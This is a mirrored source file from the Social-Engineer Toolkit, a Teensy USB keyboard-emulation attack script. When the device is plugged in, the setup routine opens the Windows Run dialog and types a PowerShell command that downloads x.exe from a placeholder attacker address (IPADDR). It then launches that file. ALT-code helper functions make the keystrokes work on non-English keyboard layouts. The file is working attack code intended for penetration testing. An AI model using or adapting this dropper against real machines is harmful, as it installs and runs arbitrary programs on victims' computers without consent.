mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-03-05 15:57:27 +00:00
212 lines
6 KiB
Text
212 lines
6 KiB
Text
|
//
|
||
|
// Social-Engineer Toolkit Teensy Attack Vector
|
||
|
// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
|
||
|
//
|
||
|
// Special thanks to: Irongeek
|
||
|
//
|
||
|
// 2011-02-28 padzero@gmail.com
|
||
|
// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
|
||
|
// * Change path from C:\ to %HOMEPATH%: Fixed payload execution on Windows 7
|
||
|
//
|
||
|
|
||
|
|
||
|
char convert[4] = "000"; // do not change this
|
||
|
char command1[] = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://IPADDR/x.exe';$file = ' %HOMEPATH%\\x.exe ';$clnt.DownloadFile($url,$file);";
|
||
|
char command2[] = "%HOMEPATH%\\x.exe";
|
||
|
|
||
|
void setup() {
|
||
|
delay(5000);
|
||
|
omg(command1);
|
||
|
Keyboard.set_key1(KEY_ENTER);
|
||
|
Keyboard.send_now();
|
||
|
delay(15000);
|
||
|
// run this executable
|
||
|
omg(command2);
|
||
|
delay(2000);
|
||
|
Keyboard.set_modifier(MODIFIERKEY_CTRL);
|
||
|
Keyboard.set_key1(KEY_ENTER);
|
||
|
Keyboard.send_now();
|
||
|
Keyboard.set_modifier(0);
|
||
|
Keyboard.set_key1(0);
|
||
|
Keyboard.send_now();
|
||
|
delay(1000000);
|
||
|
}
|
||
|
void loop() {}
|
||
|
|
||
|
void ascii_type_this(char *string)
|
||
|
{
|
||
|
int count, length;
|
||
|
length = strlen(string);
|
||
|
for(count = 0 ; count < length ; count++)
|
||
|
{
|
||
|
char a = string[count];
|
||
|
ascii_input(ascii_convert(a));
|
||
|
}
|
||
|
}
|
||
|
|
||
|
void ascii_input(char *string)
|
||
|
{
|
||
|
if (string == "000") return;
|
||
|
int count, length;
|
||
|
length = strlen(string);
|
||
|
Keyboard.set_modifier(MODIFIERKEY_ALT);
|
||
|
Keyboard.send_now();
|
||
|
for(count = 0 ; count < length ; count++)
|
||
|
{
|
||
|
char a = string[count];
|
||
|
if (a == '1') Keyboard.set_key1(KEYPAD_1);
|
||
|
if (a == '2') Keyboard.set_key1(KEYPAD_2);
|
||
|
if (a == '3') Keyboard.set_key1(KEYPAD_3);
|
||
|
if (a == '4') Keyboard.set_key1(KEYPAD_4);
|
||
|
if (a == '5') Keyboard.set_key1(KEYPAD_5);
|
||
|
if (a == '6') Keyboard.set_key1(KEYPAD_6);
|
||
|
if (a == '7') Keyboard.set_key1(KEYPAD_7);
|
||
|
if (a == '8') Keyboard.set_key1(KEYPAD_8);
|
||
|
if (a == '9') Keyboard.set_key1(KEYPAD_9);
|
||
|
if (a == '0') Keyboard.set_key1(KEYPAD_0);
|
||
|
Keyboard.send_now();
|
||
|
Keyboard.set_key1(0);
|
||
|
delay(11);
|
||
|
Keyboard.send_now();
|
||
|
}
|
||
|
Keyboard.set_modifier(0);
|
||
|
Keyboard.set_key1(0);
|
||
|
Keyboard.send_now();
|
||
|
}
|
||
|
|
||
|
char* ascii_convert(char string)
|
||
|
{
|
||
|
if (string == 'T') return "84";
|
||
|
if (string == ' ') return "32";
|
||
|
if (string == '!') return "33";
|
||
|
if (string == '\"') return "34";
|
||
|
if (string == '#') return "35";
|
||
|
if (string == '$') return "36";
|
||
|
if (string == '%') return "37";
|
||
|
if (string == '&') return "38";
|
||
|
if (string == '\'') return "39";
|
||
|
if (string == '(') return "40";
|
||
|
if (string == ')') return "41";
|
||
|
if (string == '*') return "42";
|
||
|
if (string == '+') return "43";
|
||
|
if (string == ',') return "44";
|
||
|
if (string == '-') return "45";
|
||
|
if (string == '.') return "46";
|
||
|
if (string == '/') return "47";
|
||
|
if (string == '0') return "48";
|
||
|
if (string == '1') return "49";
|
||
|
if (string == '2') return "50";
|
||
|
if (string == '3') return "51";
|
||
|
if (string == '4') return "52";
|
||
|
if (string == '5') return "53";
|
||
|
if (string == '6') return "54";
|
||
|
if (string == '7') return "55";
|
||
|
if (string == '8') return "56";
|
||
|
if (string == '9') return "57";
|
||
|
if (string == ':') return "58";
|
||
|
if (string == ';') return "59";
|
||
|
if (string == '<') return "60";
|
||
|
if (string == '=') return "61";
|
||
|
if (string == '>') return "62";
|
||
|
if (string == '?') return "63";
|
||
|
if (string == '@') return "64";
|
||
|
if (string == 'A') return "65";
|
||
|
if (string == 'B') return "66";
|
||
|
if (string == 'C') return "67";
|
||
|
if (string == 'D') return "68";
|
||
|
if (string == 'E') return "69";
|
||
|
if (string == 'F') return "70";
|
||
|
if (string == 'G') return "71";
|
||
|
if (string == 'H') return "72";
|
||
|
if (string == 'I') return "73";
|
||
|
if (string == 'J') return "74";
|
||
|
if (string == 'K') return "75";
|
||
|
if (string == 'L') return "76";
|
||
|
if (string == 'M') return "77";
|
||
|
if (string == 'N') return "78";
|
||
|
if (string == 'O') return "79";
|
||
|
if (string == 'P') return "80";
|
||
|
if (string == 'Q') return "81";
|
||
|
if (string == 'R') return "82";
|
||
|
if (string == 'S') return "83";
|
||
|
if (string == 'T') return "84";
|
||
|
if (string == 'U') return "85";
|
||
|
if (string == 'V') return "86";
|
||
|
if (string == 'W') return "87";
|
||
|
if (string == 'X') return "88";
|
||
|
if (string == 'Y') return "89";
|
||
|
if (string == 'Z') return "90";
|
||
|
if (string == '[') return "91";
|
||
|
if (string == '\\') return "92";
|
||
|
if (string == ']') return "93";
|
||
|
if (string == '^') return "94";
|
||
|
if (string == '_') return "95";
|
||
|
if (string == '`') return "96";
|
||
|
if (string == 'a') return "97";
|
||
|
if (string == 'b') return "98";
|
||
|
if (string == 'c') return "99";
|
||
|
if (string == 'd') return "100";
|
||
|
if (string == 'e') return "101";
|
||
|
if (string == 'f') return "102";
|
||
|
if (string == 'g') return "103";
|
||
|
if (string == 'h') return "104";
|
||
|
if (string == 'i') return "105";
|
||
|
if (string == 'j') return "106";
|
||
|
if (string == 'k') return "107";
|
||
|
if (string == 'l') return "108";
|
||
|
if (string == 'm') return "109";
|
||
|
if (string == 'n') return "110";
|
||
|
if (string == 'o') return "111";
|
||
|
if (string == 'p') return "112";
|
||
|
if (string == 'q') return "113";
|
||
|
if (string == 'r') return "114";
|
||
|
if (string == 's') return "115";
|
||
|
if (string == 't') return "116";
|
||
|
if (string == 'u') return "117";
|
||
|
if (string == 'v') return "118";
|
||
|
if (string == 'w') return "119";
|
||
|
if (string == 'x') return "120";
|
||
|
if (string == 'y') return "121";
|
||
|
if (string == 'z') return "122";
|
||
|
if (string == '{') return "123";
|
||
|
if (string == '|') return "124";
|
||
|
if (string == '}') return "125";
|
||
|
if (string == '~') return "126";
|
||
|
Keyboard.print(string);
|
||
|
return "000";
|
||
|
}
|
||
|
|
||
|
void release_keys()
|
||
|
{
|
||
|
Keyboard.set_modifier(0);
|
||
|
Keyboard.set_key1(0);
|
||
|
Keyboard.send_now();
|
||
|
delay(100);
|
||
|
}
|
||
|
|
||
|
void send_keys(byte key, byte modifier)
|
||
|
{
|
||
|
if(modifier)
|
||
|
Keyboard.set_modifier(modifier);
|
||
|
Keyboard.set_key1(key);
|
||
|
Keyboard.send_now();
|
||
|
delay(100);
|
||
|
release_keys();
|
||
|
}
|
||
|
|
||
|
void omg(char *SomeCommand)
|
||
|
{
|
||
|
Keyboard.set_modifier(128);
|
||
|
Keyboard.set_key1(KEY_R);
|
||
|
Keyboard.send_now();
|
||
|
Keyboard.set_modifier(0);
|
||
|
Keyboard.set_key1(0);
|
||
|
Keyboard.send_now();
|
||
|
delay(1500);
|
||
|
ascii_type_this(SomeCommand);
|
||
|
Keyboard.set_key1(KEY_ENTER);
|
||
|
Keyboard.send_now();
|
||
|
Keyboard.set_key1(0);
|
||
|
Keyboard.send_now();
|
||
|
}
|